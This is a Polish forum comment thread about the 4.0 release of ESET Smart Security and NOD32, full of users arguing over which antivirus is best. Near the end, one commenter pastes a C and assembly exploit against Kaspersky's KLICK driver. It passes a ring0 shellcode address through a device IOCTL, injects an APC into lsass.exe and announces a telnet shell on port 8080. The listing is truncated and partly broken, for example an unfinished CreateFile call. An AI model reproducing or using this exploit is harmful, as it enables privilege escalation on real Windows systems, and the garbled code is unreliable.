ESET Smart Security 4.0 i NOD32 Antivirus 4.0

Taka blokade portow usb mozna objesc. EOT

Najlepszy płatny antywirus.

"Użytkownicy ESET Smart Security 3.0 oraz ESET NOD32 Antivirus 3.0 będą mogli bezpłatnie zaktualizować swoje rozwiązania do najnowszych wersji 4.0."

A może łaskawie jeszcze napiszecie w jaki sposób, bo żadnej opcji do tego nie widze?...

zgodzę się z tym, że to najlepszy płatny antywirus. Żadne Avasty i Symanteci nie są w stanie go pokonać. Oczywiście Avast jest popularny ze względu na darmową licencję, więc większość go używa (sam instaluję go klientom, ale tylko dlatego, że darmowy). Generalnie avast jest niczym dziurawe sito. Najbardziej lubię w Avascie sytuację, gdzie ochrona rezydentna jest włączona, a program milczy. Skanujesz, a tu nagle okazuje się, że wyhodowałeś na dysku stadko wirusów. Natomiast demo noda to tylko 30 dni, ale za to jest to bezpieczne 30 dni.

@Trrr: aktualizacja będzie możliwa poprzez ściągnięcie i instalację z pliku nowej wersji. Wersje testowe najnowszych produktów ESET nie są jeszcze dostępne do pobrania.

z tego co ja widzę to na stronie eset'a można już pobierać wersje testowe 4
http://www.eset.pl/pobieranie/pobieranie/wersja-testowa-eset-smart-security.html

A właśnie że są i to 4.0 :P

http://www.eset.pl/pobieranie/pobieranie/wersja-testowa-eset-smart-security.html

link do aktualizacji: http://www.eset.pl/pobieranie/pobieranie/pobieranie-eset-nod32-antivirus.html
Żąda oczywiście nazwy użytkownika i hasła.

Również uważam, że Nod to obecnie najlepszy antywirus. Cenię go za szybkość działania, fajny outfit oraz bardzo dobrze sprawująca się heurystyka, która do tej pory mnie nie zawiodła. Co do zabezpieczeń portów wymiennych, świetna sprawa, tylko pytanie, czy łatwo to obejść?

Czy ta blokada usb rozróżnia, czy blokuję myszkę, czy pendrivey ?

NOD32 4.0 dołączył niestety do grona antywirusów które skreślam z listy. Po prostu po:
1. dość często wykrywa zagrożenia, ale już nie jest w stanie ich usunąć
2. często wszczyna fałszywe alarmy. Co ciekawe robi to nawet z wtyczką OBook http://my.opera.com/Dmitry%20Antonyuk/blog/ istniejącą od połowy 2006 a który dotychczas NOD32 we wcześniejszych wersjach klasyfikował jako dobry. Inne antywirusy nie wszczynają alarmu. Informowałem o tym firmę ESET ponad miesiąc temu i nic., jak krzyczał tak krzyczy. A takich kwiatków sam wykryłem kilka.

NODa używałem przez dwa lata, pod koniec marca kończy mi się subskrypcjai raczej już jej nie przedłużę. Szkoda mi pieniędzy na antywuira który ostrzega przed zagrożeniami których nie ma.

Warto napisać o wersji HOME i BUSINESS dla wersji 3 i 4 których wcześniej nie było.

A aj już mam eseta ss4 :D

@Piotrek
Z tego co widze to jest wyświetlone drzewo portów usb i zaznaczasz które mają być otwarte po podłączeniu pena.
Nie wiem tylko jak to jest z klawą i myszą pod usb, bo mam je na ps/2.
Być może po odłączeniu klawy i wpięciu w to miejsce pena da się coś zrobić.

Nie wie ktoś czy interfejs został choć trochę zmieniony ? :)

Trrr, no to w takim razie porażka... powinno być tak, że blokuje nie tyle porty USB, co wszelkie "pamięci masowe" podłączane do tych portów, ewentualnie dać to jako dodatkową opcję wyboru. Bo w innym przypadku koleś odłączy myszkę czy drukarkę z portu usb i wepnie tam pena.

@josef:
Polecam instalowanie klientom Avira AntiVir zamias Avasta - do zastosowan domowych jest bezplatny, a o niebo skuteczniejszy.

@Cale grono zakochanych w NOD32:
Tak naprawde NOD nie jest nani najlepszym ani najskuteczniejszym antyvirem. Fakt jest dobry i szybki i to trzeba przyznac, ale bez przesady. KAV ma porownywalna szybkosc a w wiekszosci testow wypada lepie (czyt. jest skuteczniejszy).

Z kolei jesli chodzi o najskuteczniejsze to sa to Symantec Norton Antyvirus i G-DATA AntyVirenKit. A mianowicie ten drugi ze wzgledu na zastosowanie dwuch silniekow skanujacych jednoczesnie wyroznia sie wysoka skutecznoscia - przewaznie najwyzsza, niestety nic darmo, oba bardzo obciazaja system ;(

Sam uzywalem NODa ale przesiadam sie na KAV

trzeba będzie potestować

@anonim:
"Taka blokade portow usb mozna objesc. EOT"

A czego się dzisiaj nie da obejść? :)

To bardzo zagmatwana informacja. O co tu chodzi? W końcu są to wersje finalne czy testowe i dlaczego nie moża ich pobrać. Ktoś chciał się wykazać ale mu nie wyszło.

Jak czytam komentarze znawcow od wirusow to mnie krew zalewa. Avast ma kosmiczna przewage nad innymi programami, a jest nia SKANOWANIE PRZED ROZRUCHEM. Druga sprawa, ktos powiedzial o chodowaniu, NOD32 przepuszcza Antywir 2009, pozwala mu sie zainstalowac, a potem krzyczy, ze nie moze usunac. Avira ma dobra wykrywalnosc, ale slabo radzi sobie z usuwaniem. AVIRA NIE POTRAFI USUNAC AUTORUN.INF Z ZAINFEKOWANEGO PENA I NIE RADZI SOBIE Z PROSTYMI .BAT NA PENIE!!! Avast jest dobrym softem, jest tylko mieszany z blotem tak samo jak Neostrada. Dzieci internetu tylko powielaja stek bzdur.

Testowałem Eset Smart Security v4.0 i AVAST Professional v4.8 na laptopie Benq

Podkreślę żę**(Avasta używam od dawna)

Parametry laptopa:
(Intel Celeron M380,1600MHz jedno rdzeniowy)
( 512MB Ram DDR1 533MHz Nanya)
( Dysk 60GB Fujitsu 4200Rpm Ultra ATA/100 )

Zacząłem ściągać z internetu Firefoksem różne programy, o dużej i małej pojemności
np. Eset po ściągnięciu pliku nadal go skanował nawet przez parę sekund np. plik 10mb 7 sekund.
Avast przy tym samym pliku kończył skanowanie po 1 sekundzie po zakończeniu ściągania.
Tak samo miałem z Kasperskim IS 2009 też po ściągnięciu jakiegoś pliku exe nadal go skanował przez parę sekund.
Dlatego wolę używać AVAST bo te inne zamulacze robią tą samą robotę tylko o 60% dłużej.
Wykrywalność Avasta jest bardzo dobra, wystarczająca dla każdego domowego użytkownika, zaawansowanego lub nie.
Do Avasta Pro polecam zaporę ogniową ZoneAlarm Pro, i można śmiało śmigać po sieci nawet po ty stronach co mają najwięcej wirusów, wiecie jakie :p (stronki z pornolami)
Aha i najważniejsza rzecz to częsta aktualizacja bazy wirusów.


Pozdrawiam. SUPERNOVA™

Uzywam wersji 3 i jest świetny.Jakiś czas temu zainstalowałem wersje beta i ......w jedym emailu znalazło mi wirusa...niestety straciłem całą pocztę...

jak tak czytam kolejne komentarze, to mam wrażenie, że w większości udzielają się na portalu zwanym dobreprogramy pryszczaci nastolatkowie, którzy w sygnaturkach mają konfig kompa i próbują w każdej swojej wypowiedzi przekonać do tego, czego sami używają. Kurde mać, zero konkretów. Np. koleś pisze, że KAV najlepszy, że się przesiada. No to się przesiadaj, ale nie musisz tak się z tym obnosić, bo np. ja spotkałem się akurat w firmie z dwoma przypadkami, że koleś miał zawirusowanego penka, a nie chciał się przyznać że to on, mówiąc: "ale ja jestem na co dzień przedstawicielem Kasperskiego, używam tego pakietu i nigdy nie miałem wirusa". Więc Mite, weź no chłopie wyluzuj, albo miejże radość, że wyraziłeś swoją opinię, która jest *** warta :D

Od 5dni testuję wersję RC ESS i jestem bardzo zadowolony :) jedyne do czego się mogę przyczepić to to że ESS nie wyłączył Windowsowego Firewalla jak to zrobił KIS, pozatym ok...

Zapewne niedługo w jakimś magazynie pc będzie ESS lub nod nowy na 90dni podobnie jak to było jak 3wchodziła....

Avast w testach jest lepszy od Noda. Pora przestań czytać testy w których zawsze nod wygrywa bo one sa niemiarodajne. Nod jest dobry póki system nie zostanie zainfekowany - potem już sobie nie radzi. Lepiej zapobiegać niż leczyć a odgapiać rozwiązania od innych producentów (patent firmy Kasprsky na szybkie skanowanie) każdy umie

Mialem Avira Antivir Premium Suite - chwile po starcie systemu były problemy z odpalaniem programów. Nie reagowały. Nie wiem czy to wina aviry czy wspolpracującego z nia comodo ale blad.

Mialem noda - dobra, nie obciaza, ok. Ale jak juz doszlo do infekcji - zero, nie potrafi usunac, nic nie robi. Porazka.

Mam Kasperskiego - nie ma problemów. Potrafi usunąć szkodnika gdy wtargnął on już do systemu i przynajmniej coś robi. Ma jeden z najlepszych firewalli spośród pakietów IS.

Werdykt: antywirus ktora w ogole nie obciaza, nic nie robi. Na co mi antywirus ktory usunąć nie umie prostego wirusa?

@ttt
Nie podniecaj się tak, bo Ci żyłka pierdząca pęknie. :P
Eset SS 3 i 4 ma skanowanie i przed rozruchem, w czasie i po. Wystarczy zajrzeć do ustawień zawansowanych i sobie ustawić w profilu co i jak się chce aby było skanowane.

Dziś wystąpiły dwie groźne wpadki Noda - http://forum.antivir-polska.info/thread-867.html (cały temat do przeczytania)

Używam NOD32 AV v3 od około roku, teraz testowałem wersję beta i rc wersji 4. Nie mam żadnych zarzutów co do działania i wykrywania wirów. Używam wersji z kopią dystrybucyjną na rozłożoną na dwa serwery i działa. Włożenie zawirusowanego pena od razu skutkuje zablokowaniem dostępu do zasobu i komunikat wędruje do serwera, widać to w konsoli i na dodatek przychodzi mail do admina.
Jak ktoś nie zna podstawowych zasad bezpiecznego korzystania z różnego typu zasobów to będzie miał sporo "wychodowanych" zwierzaków.

Co do blokowanych portów USB, to blokowane są wszelkiego typu pamięci masowe a nie klawiatura czy myszka.

Jednym słowem polecam zarówno v3 jak i nową v4.

czy ktoś może mi polecić dobry program antywirusowy.

A dla mnie niezmiennie od 3-4 lat najlepszy jest KIS. Obecnie KIS 2009. Kacperek jeszcze nigdy mnie nie zawiódł a komputer chodzi bez zarzutów. Oby tak dalej, chociaż już niecały miesiąc subskrypcji mi pozostał :/ Będzie trzeba pomyśleć chyba o czymś innym np NIS 2009 czy G-Data AntiVirenKIt 2009

Jak nie można pobrać jak są umieszczone w strefie płatnej !

Hmm, czy maja z powrotem jakies sensowne GUI? Czy kontynuuja ta tragedie z serii 3?

Popieram przedmówce. Avast jest cool!!!\
U mnie tez skanuje przed rozruchem, a nawet juz przed wlaczeniem kompa, a potrafi i po wylaczeniu
ROTFL

josef | IPHASH : EB-28-TG-H0 | 02.03.2009, 17:33
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6

[...] Generalnie avast jest niczym dziurawe sito. [...]
Widzę, że dla Ciebie sito bez dziur jest o wiele bardziej funkcjonalne ^^

"Taka blokade portow usb mozna objesc. EOT"

wszystko można obejść....*** !!! jakieś
przykłady ??

Myślę, że wersje testowe są już do pobrania chociażby z http://download.eset.com/eval/win/eav/eav_nt32_plk.msi w wersji polskiej 4.0.314. Niemniej tak jak napisałem, proszę z rezerwą podchodzić do alarmów wersji 4.0.

Powiem tak każdy używa według uznania i własnych doświadczeń. Ja np. noda już od ponad 2 lat używam i jestem zadowolony co do avasta to na początku także go używałem nie mówie lekki, darmowy i w miare rozbudowany antyvir ale niestety ma pewną wadę a przekonałem się o niej już na wielu kompach także u kumpli po pewnym czasie jak system jest postawiony i hula (tak ok 4 - 6 miesiecy) avast zaczyna zamulać kompa długo się włącza, ładowanie systemu długo trwa itp. z nodem juz od ok 8 miesięcy po instalce systemu nie mam takich problemów, a po odpowiednim ustawieniu skanowania w czasie rzeczywistym przy pobieraniu nie mam problemów o jakich pisał kolega wyżej z pobieraniem. Co do KAV'a nie mogę się z @Mite zgodzić bo sam na pracowniach w szkole się przekonałem, że na identycznych kompach z tym samym systemem, softem itp. różniących się tylko antyvirem kompy z Nodem działają o niebo lepiej i bardziej komfortowo np. podczas kompilacji programu w VS KAV potrafi zablokować całkowicie aplikację tak by nie mogła nic zrobić i jedyne co można wtedy uczynić to przerwać wątek VS co wiąże się z ponownym uruchamianiem środowiska przez co musimy antyvira wyłączać przed lekcją z czym nod nie ma problemu

Miałem NOD32 przez pół roku i wydawało się, że jest wszystko OK, dopóki nie spostrzegłem, że mi się komp strasznie zamulił. Kumpel polecił sprawdzić innym antywirusem. W ręce wpadł mi Arcavir, który znalazł setki wirusów, pomógł jedynie format dysku. Arcavir the Best :) oczywiście przelecę od czasu do czasu KAV, albo G-DATA (demo) ale nic nie znajdują

Zaktualizowałem dziś do wersji 4.0 i zobaczymy co to będzie. Zgadzam się z większością, że KIS lepszy, ale dostałem ESET-a w prezencie i szkoda byłoby mi licencji! Na razie używam i nie miałem problemów. Skanuje często online Kasprem i jest ok! Jak skończy mi się licencja na pewno jednak wrócę do KIS!

Skoro jest możliwość bezpłatnego upgradu to pewnie bedzie w tej samej cenie co stary SS? Za miesiąc kończy mi się licencja i szukam prawdę powiedziawszy najtańszego rozwiazania - tak, wiem, że jest Avast ale spotkalem się z wersja competitive upgrade czy ktoś mial z tym do czynienia - wychodzi taniej duzo taniej niz wersja pelna - nie wiem gdzie tu logika stad tez pytanie

Norton Internet Security 2009... i wszystko w tym temacie!
Nic nie obciąża, a kosi wszystko. Dziękuję za uwagę.
P.S. Zresztą zobaczcie na ceny. Jest najdroższy ale i najlepszy.

Autostart pendriva (i/lub napędu optycznego) można wyłączyć w programie TweakUI z Powertoys for Windows XP, nie trzeba do tego antywirusa.
Natomiast Vista pyta, czy uruchomić.

Ściągnąłem wersję testową i nie chce mi się nod aktualizować piszę że nie jest konieczna aktualizacja a data orginalnej jest z 26.02

Haha, ale mam ubaw. Się dobrała grupa nastolatków, zakrzykujących się nawzajem który AV jest lepszy. Rozumiem, że wasze doświadczenia opieracie na próbce wynoszącej maksimum 5 komputerów?

@Rafioli

Wyjątkowo konstruktywna krytyka, nie ma co. Akurat tak się składa że pryszcze przestałem wyciskać jakieś ćwierć wieku temu (ale fajnie znów poczuć się młodo...:-)), swojego pierwszego maila wysłałem w 1992 roku, a liczba komputerów pod moimi skrzydłami (własnych, rodziny i znajomych) jest większa niż "...naście" i zbliża sie do "...dziesiąt".

Niestety NOD32 zalicza ostatnio wpadki, czasem dość zawstydzające. Co ciekawe taki NOD w wersji 3.0 długimi miesiącami zaliczał (cały czas zalicza? nie wiem, bo juz nie używam) spakowany zipem LameXP http://mulder.dummwiedeutsch.de/home/?page=projects serii 3.xx jako wirusy. Co ciekawe wersja NODa 4.0 tego już nie robi. Cudowne uzdrowienie? Mogłoby się tak wydawać, no ale są też przypadki odwrotne jak wzmiankowany przeze mnie OBook (notabene, wyszła wersja nowa wersja Opery, właśnie ją zainstalowałem...) czy Vampix 1.0.15 http://www.kcsoftwares.com/index.php?vampix Tu z kolei NOD 4.0 wykrywa wirusy, a NOD 3.0 - nie (inne antywirusy też nie). Co zadziwiające, jak już wspomniałem takich kwiatków sam wykryłem kilkanaście, część owych programów jest nawet opensourcowa (sic! a więc ESET może sobie je dokładnie przejrzeć!), a ja przesłałem plikii do ESETa. I co? i nic. Widocznie ktoś u producenta CELOWO podjął decyzję, że lepiej aby antywirus wszczynał fałszywe alarmy, widząc je tam gdzie żaden inny antywirys ich nie widzi. Idąc dalej tym tropem najlepiej oznaczyć prewencyjnie WSZYSTKIE pliki jako wirusy - skuteczność na pewno zbliży sie do 100%. Rzecz tylko, że wiarygodnośc spadnie do zera.

NOD32 4.0 nie jest złym antywirusem. Niestety nie jest także dobrym antywirusem. Jest po prostu przeciętny, taka klasa średnia. Niewątpliwie zaletą jest jego mała odczuwalność w systemie, natomiast wiarygodność wskazań jest mocno problematyczna. Co dziwne, jest to stan który ciągnie się od ładnych kilku miesięcy, a producent nie reaguje nawet jak ma wszystko jak na talerzu i ładnie opisane. Zatem nie potrafi? Nie zależy mu? To pytanie zostawiam otwarte***


***choć może Rafioli odpowie. Kto wie?

Wiec uzytkownicy kasperskiego, zyjcie w nieswiadomosci... Zyjcie dalej, jako antywir OK, jako aplikacja w rekach atakujacego? Porazka, masa dziur w programie dajaca sie wyeksploitowac nawet przez Remote access. Polecam lekture: http://www.zdnet.co.uk/tsearch/security+kaspersky+exploit.htm

dodam, ze blad jest stale ten sam od wersji 6.0 kis ,kav pozwole sobie przedstawic kawalek kodu.
/wywołanie ring0/
mov eax,fs:[0x124]//
mov esi,[eax+0x44]//proces w pamieci
mov eax,esi
search:
mov eax,[eax+0x88] //activeprocess
sub eax,0x88
// cmp dword ptr[eax+0x84],0x444//EPROCESS_PID
cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe
jne search
// mov ebx,dword ptr[eax+0xc8]//system token
mov ebx,eax
lea esi,code//code
mov ecx,0x1d6// code = 0x1d6
mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000
push edi
mov edi,[edi]
rep movsb
pop edi
mov ecx,dword ptr[ebx+0x190]
finddelay:
mov ecx,[ecx]
cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait
jnz finddelay
sub ecx,0x22c
mov ebp,ecx
push 0x30//APC Object sizeof
push 0 //Nonpage
mov eax,ExAllocatePool//ExAllocatePool for APC Object
call eax//call ExAllocatePool
mov esi,eax
xor edx,edx
push edx//NULL
push 01//UserMode
// push dword ptr[edi]//user mode shellcode
mov eax,0x7ffe0800//user mode shellcode
push eax//User Mode routine
push edx//NULL
mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret
push eax//Kernel Mode routine
push edx//NULL
push ebp//ETHREAD
push esi//APC object
mov eax,KeInitializeApc //initialize APC
call eax
xor ecx,ecx
xor edx,edx
xor eax,eax
push eax
push eax
push ebp//ETHREAD
push esi//APC Object
mov eax,KeInsertQueueApc
call eax
// test eax,eax
// jz recall
mov byte ptr[ebp+0x4a],0x1

/*
push 0x80000000
push 0
push 0
mov eax,0x804dd4b8
call eax
*/
/*
yeldloop:
mov eax,0x804df4d5
call eax
jmp yeldloop
*/
iretd
/*end here*/
int 3
NOP
NOP
}

exit(1);
}
BOOL getNativeAPIs(void)
{
HMODULE hntdll;
hntdll = GetModuleHandle("ntdll.dll");
*(FARPROC *)&_NtQuerySystemInformation =
GetProcAddress(hntdll, "ZwQuerySystemInformation");
if(_NtQuerySystemInformation)
{
return TRUE;
}
return FALSE;
}
DWORD getKernelBase(void)
{
HANDLE hHeap = GetProcessHeap();
NTSTATUS Status;
ULONG cbBuffer = 0x8000;
PVOID pBuffer = NULL;
DWORD retVal = DEF_KERNEL_BASE;
do
{
pBuffer = HeapAlloc(hHeap, 0, cbBuffer);
if (pBuffer == NULL)
return DEF_KERNEL_BASE;
Status = _NtQuerySystemInformation(SystemModuleInformation,
pBuffer, cbBuffer, NULL);
if(Status == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(hHeap, 0, pBuffer);
cbBuffer *= 2;
}
else if(Status != STATUS_SUCCESS)
{
HeapFree(hHeap, 0, pBuffer);
return DEF_KERNEL_BASE;
}
} while (Status == STATUS_INFO_LENGTH_MISMATCH);

DWORD numEntries = *((DWORD *)pBuffer);
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD));
for(DWORD i = 0; i < numEntries; i++)
{ if(strcmpi(smi->ImageName, "ntoskrnl.exe"))
{
printf("%.8X - %s\n", smi->Base, smi->ImageName);
retVal = (DWORD)(smi->Base);
break;
}
smi++;
}

HeapFree(hHeap, 0, pBuffer); /zapelnienie pbuffer hhepem przez lce

return retVal;
}
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_ _SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{

DWORD InBuff[1];
DWORD dwIOCTL,OutSize,InSize,junk;
HANDLE hDevice;
OSVERSIONINFO ov;
system("cls");
ov.dwOSVersionInfoSize = sizeof(ov);
GetVersionEx(&ov);
if(ov.dwMajorVersion != 5)
{
return 1;
}

if(ov.dwMinorVersion != 1)
{
return 1;
}
getNativeAPIs();

kbase=(unsigned long *)getKernelBase();
base=LoadLibrary("ntoskrnl.exe");

ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool");
KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc");
KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc");
ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution");
ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase);
KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase);
KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase);
ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase);
FreeLibrary(base);

hDevice = CreateFile("\\\\.\\KLICK",
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] KLICK Device Handle [%x]\n",hDevice);
InSize = 0x8;
InBuff[0] =(DWORD) Ring0Function; // Ring0 ShellCode Address
dwIOCTL = 0x80052110;
printf("[!] IOCTL [0x%x]\n\n",dwIOCTL);
printf("polaczenien\n");
printf("Telnet x.x.x.x 8080 działa ;]:P\n\n");
DeviceIoControl(hDevice,
dwIOCTL,
InBuff,0x8,
(LPVOID)NULL,0,
&junk,
NULL);
}


Tak wiec analizujac ten kod pod winxp sp2/3 oraz shellcode zrozumiecie ze Kasperskiego programowali Debile, to jest jedynie jeden z tysiaca bledow

Niedobrze mi się robi jak czytam wasze komentarze. Jeden pisze, że mu komp muli, drugi, że Nod32 nie potrafi usuwać wirusów, trzeci, że mu się nie chce aktualizować. Powiem tyle - ja korzystam z Noda już 5 lat (łącznie z najnowszą wersją) i nigdy nie zauważyłem żadnych kłopotów z wyżej wymienianych. Totalni lamerzy z Was, najpierw nauczcie się podstaw obsługi komputera z choćby minimalnym użyciem mózgu, a zobaczycie, jak problemów ubywa ;) Jednocześnie chciałem zaznaczyć, że tzw program antywirusowy powinno się instalować na czysty (dopiero co zainstalowany) system i ma on służyć do blokowania ewentualnych wirusów, chcących dostać się do komputera. Nie liczcie, że totalnie zawirusowany i pochrzaniony system jakikolwiek program wam naprawi :)
Dodatkowo uważam - co mam też zamiar uczynić w najbliższej przyszłości - że antywirusa można się pozbyć całkowicie przy rozsądnym korzystaniu z komputera.
Pozdrawiam tych wiecznie niezadowolonych. Yo

Zgadzam się z Andrzejem P. ArcaVir 2009 posiadam również i jestem bardzo zadowolony w przeciwieństwie do NODA. Polski produkt bardzo szybko się rozwija. W PC WORLD nawet nr 03/2009 jest opis użytkowników - jaki pakiet zabezpieczający jest najlepszy i ArcaVir 2009 jest juz na 3 miejscu!!! Polecam ten produkt naprawde

podczas skanowania strasznie PCU wrzera;/ a mialo byc tak pieknie...

Już za przeproszeniem niedobrze się robi, jak jedni apoteozują NOD-a lub ESET-a, a inni wieszają wszelkie psy! Dotyczy to z resztą każdego pakietu AV, nie mówiąc już o systemach operacyjnych! Niech każdy używa co uważa za stosowne i na co go stać! Mamy przecież tzw. wolność wyboru! Powtórzę tylko za Dostojewskim, że "ideał jest równie rzeczywisty, jak rzeczywistość"! Więcej dystansu do siebie, innych, programów...etc Panowie i Panie! POZDRAWIAM:-)

@golo73

Wiesz, każdemu robi sie niedobrze od czegoś innego. Mnie na przykład od tego, że pierwszy raz wiadomości o fałszywych alarmach firma ESET została powiadomiona w kwietniu http://forum.doom9.org/archive/index.php/t-119749.html (przeze mnie w maju i to kilkukrotnie). Oprócz tego takie false positives dawało jeszcze kilka produktów AV. Rzecz w tym, że one przestały sygnalizować NIEISTNIEJĄCE zagrożenie po kilku dniach. NOD32 3.0 robił to jeszcze w styczniu, mimo co najmniej kilkunastu zgłoszeń - co stawia pod znakiem zapytania rzetelność baz i interakcję na linii firma antywirusowa - klient.
Jeśli płacę to mam prawo wymagać. Muszę mieć też zaufanie, że jak zdarzy się prawdziwe zagrożenie to firma (nie tylko sam program!) stanie na wysokości zadania i zrobi to co do niej należy i jak należy, a nie rozłozy ręce i powie "tak wyszło". Inni być może mają inne priorytety, tak jak na przykład używają prezerwatyw które czasem działają, jeżdżą względnie bezpiecznymi samochodami, zażywają umiarkowanie przebadane lekarstwa, trzymają pieniądze w instytucjach w dosyć dobrej kondycji, ubezpieczają w instytucjach o dość dobrej reputacji. Co kto lubi. Niektórzy twierdzą, że życie bez dreszczyku emocji jest nudne. Ja gram w lotto i zakłady piłkarskie. I to mi wystarczy.

No to fajnie. Kiedy chciałem zaktualizować NOD32 mówiło, że baza jest aktualna - A baza wirusów jest z 26 lutego.

Próbowałem aktualizować kilka razy i dalej wywalało, że jest aktualna. Aż wreszcie NOD32 zaktualizował swoją bazę wirusów do wersji 3904 (baza z 3 marca).

Śmiać mi się chce jak widzę że ktoś pisze coś w stylu "w testach antywirus taki a taki jest lepszy." Piszcie jakie testy a nie takie z **** rzeczy niepoparte niczym.

@Galaktyczny Edek
oczywiście zgadzam się z Tobą w 100% i dlatego na przykład porzuciłem ArcaVira, bo mnie zawiódł na całego!:( Chodziło mi bardziej o to, że niestety ideału nie ma! Jak pisałem wyżej używałem KIS i na pewno do niego wrócę, jak skończy mi się ważność licencji ESET-a! Poza tym niektórzy piszą dla samego pisania i nie testowali programów, o których tak bardzo się wypowiadają! Ty na pewno do nich nie należysz! Ja z resztą też miałem w ESET fałszywe alarmy, które zniknęły dopiero po miesiącu i także zgłaszałem to do firmy! Więc nie jestem jakimś bezkrytycznym fanem ESET-a! Życzę Ci znalezienia AV, z którego bedziesz zadowolony na 100%! POZDRAWIAM:-)

Prawie godzinę czytałam posty. Eset Smart Security używałam kilka lat i wciąż miałam problemy z komputerem. Serwisant otworzył mi oczy rok temu, jak usunął Eset a wgrał ArcaVira 2008, który znalazł dzisiątki koni trojańskich, robaków i innych wirusów. Teraz moja rodzina używa ArcaVir 2009 z zaporą ogniową i za 5 licencji zapłaciłam 120 złotych. Piszcie i mówcie sobie co chcecie o Nodzie, że najszybszy, najlepszy i inne bzdety. ArcaVir 2009 za 120 złotych na 5 komputerów i do tego polski program jest dla mnie najlepszy, najszybszy, najskuteczniejszy i prawdziwy kiler na wirusy. Polscy programiści są uważani za najlepszych na Świecie i jak czytam wygrywają większość światowych konkursów, to chyba złego programu antywirusowego by nie zrobili. Najważniejsze jest jednak to, że od ponad roku problemy z komputerem ustały i nie zauważyłam spowolnienia nawet oglądając długie filmy w internecie. Polecam polski ArcaVir bo cudze chwalicie, a swego nie znacie. W pracy też informatyk kupił i zainstalował polski program. Jest the besciak jak Rysiek Geer.

dla wszystkich zawiedzionych... czy wy do cholery jak instalujecie eseta czytacie jakie daliście ustawienia?? zapewne większość zaznacza funkcje "niechciane aplikacje" funkcja ta powoduje że czasami wyskakują tego typu błędy jak jest dany program dziurawy lub dziwnie dużo gromadzi danych o użytkowniku lub podejrzanie się zachowuje....

Jak używam klawiatury i myszy na USB a chcę zablokować USB aby nie łyknąć z pendrive`a jakichś wirusów ostatnio dosyć popularnych to co? Muszę zmienić klawę i mysz na poczciwego PS/2? Jeśli tak to dla mnie ta funkcjonalość jest ŻADNA albo dobrze nie przemyślana. Aż z ciekawości zainstaluje sobie testówkę i wybadam jak to jest w praniu z tymi nowymi funcjonalnościami w 4 generacji.

Lupka1 z twojego posta wynika ze z Ciebie niezly lamus :D

do Łysy:

a to dobre, zmienić klawiaturę i mysz na PS/2 :):):)

ESET SS4 ma taką funkcję co blokuje wszystkie nośniki pamięci wkładane do portów a nie same PORTY :)

No właśnie komper jestem po deinstalacji ESET SS4 funkcje to on moźe ma ale nie funkcjonują w nowej wersji tylko są opisywane. Powróciłem do mojejgo poczciwego starego programu. Więcej testów ESET SS4 a później wypuszczjcie go na rynek bo zmarnwałe prawie cały dzień. Pisał to Broniewski a programiści mają programować soft a nie pisać. Nie instalujcie bo sie przejedziecie na nowym nodzie - popelinka w czeskim wydaniu.

hehehhe
Galagetyczny Edek jest dobry nie ma co ;)
nascie kompow masz nad soba? dzieciak nie czytalem wszystkich komentarzy ale wiem ze wypowiadaja tu sie specjalisci IT a ty sasiadowi kompa przeinstalowales i na temat wirusow sie wypowiadasz? bo ty noda kiedys miales, ja noda mam na 50 stacjach w kilku firmach zarzadzam wszystkim lezac w lozku a o tym ze jakis pajac wlozyl pendriva do kompa ktore wczesniej skanowal avastem to wiem po minucie i nie zamienil bym NODA BE + ERA na zaden inny soft
pozdrawiam

ale się uśmiałem :D
Post wyżej "anonim"
Leżąc w łóżku gdybyś był zainteresowany możesz zarządzać już prawie każdym pakietem biznesowym. G DATA, ESET, Kasperski... wszystkie te programy oferują taką funkcjonalność. Mało tego, możemy w niektórych przypadkach mówić o zapasowych serwerach, zarządzaniu siecią przez przeglądarkę itp. itd... eset niczym się tu nie wyróżnia a nawet odstaje bo jakość bezpieczeństwa jest po prostu przeciętna.

Zarządzam siecią z 367 końcówkami stałymi i 59 zdalnymi i jak dla mnie jesteś szczaw, który bawi się zapałkami. "Wcale się nie chwale ja po prostu mam talent";) i nie lubię jak ktoś się wywyższa tak jak Ty - SZCZAWIU bez zielonego pojęcia o rozwiązaniach antywirusowych.

Zastanawiam się ilu z komentatorów jest opłacanych za pisanie takich wspaniałych rzeczy heheh nawiązując do głośnego tematu z ostatnich dni.

Jeśli ktoś chce CHRONIĆ DANE a nie cieszyć się że ma coś modnego to polecam Kasperskiego lub Gdata.

Ale jestes zabany anonim powyzej, ja zarzadzam siecia rzadowa skadajaca sie nie z setek ale tysiecy komputerow i jestes dla mnie leszczem z podstawowki. Nie lubie jak ktos sie wywyzsza jak ty. Uzywamy ESET i jest on najlepszy. A GDATA to moze i jest dobra jak sie ma komputer z 4-8GB ramu u nas sa srednio-niskiej klasy komputery i ta twoja gdata by zjadala wieszkosc zasobow. Najlepszy jest ESET o czym swiadczy ze przedsiebiorstwa panstwowe korzystaja z pakietu ESET. Aha i nie mowie tutaj o polsce tylko USA

